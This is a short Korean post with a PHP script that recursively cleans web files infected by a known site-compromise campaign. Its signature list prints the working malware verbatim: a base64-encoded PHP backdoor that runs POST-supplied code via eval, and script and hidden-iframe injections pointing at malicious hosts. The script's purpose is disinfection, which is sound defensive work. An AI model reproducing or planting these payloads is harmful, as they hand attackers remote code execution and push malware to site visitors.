실행한 디렉토리부터 하위단에 있는 모든 파일을 다 뒤져서 감염된 파일을

수정하는 방식으로 되어 있다.

<?php
//usage : php -f kickHack.php @infected directory root

$hackArr = array(
 '<?php eval(base64_decode(\'aWYoIWZ1bmN0aW9uX2V4aXN0cygndnIxJykpe2Z1bmN0aW9uIHZyMSgkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwzcGhhVzU1Y205NExtTnZiUzlmY0hKcGRtRjBaUzlvWldGa1pYSXVjR2h3SUQ0OEwzTmpjbWx3ZEQ0PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24gdnIxMigkYSwkYiwkYywkZCl7Z2xvYmFsJHZyMTE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJHZyMTEpKWNhbGxfdXNlcl9mdW5jKCR2cjExLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd2cjEnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCd2cjEnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kdnIxbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcigndnIxMicpKSE9J3ZyMTInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==\')); ?>',
 'document.write(\'<script src=http://zainyrox.com/_private/header.php ><\/script>\');',
 '<script src=http://zainyrox.com/_private/header.php ></script>',
 '<iframe frameborder="0" onload="if (!this.src){ this.src=\'http://superkahn.ru:8080/index.php\'; this.height=\'0\'; this.width=\'0\';}" >fspcmsjgtslisadhstuqkmwehtuenjt</iframe>',
 '<div style="display:none">kagigwwmmrjjjyrfqapcnzywvzeuijp<iframe width=127 height=336 src="http://icq-tel.ru:8080/index.php" ></iframe></div>'
);

$startDIR = $_SERVER['PWD'];

$self = $startDIR.'/'.$_SERVER['PHP_SELF'];

function healFile($dir){
 global $hackArr,$self;
 $matchcnt = 0;
 $files = scandir($dir);
 while ( $files ) {
  $popname = array_pop($files);
  $theFile = $dir.'/'.$popname;
  if ( is_dir($theFile) && !in_array($popname,array('.','..')) ){
   healFile($theFile);
  } else if ( $self == $theFile ){
  } else if( in_array(substr($popname,-4),array('.htm','.php','.inc')) || substr($popname,-5) == '.html' || substr($popname,-3) == '.js' ){
   $cont = file_get_contents($theFile);
   $res = str_replace($hackArr,'',$cont,$cnt);
   if ( $cnt > 0 ){
    $matchcnt++;
    file_put_contents($theFile,$res);
   }
  }
 }
 if ( $matchcnt > 0 ){
  echo $dir.' '.$matchcnt." found\n";
 }
}
healFile($startDIR);

?>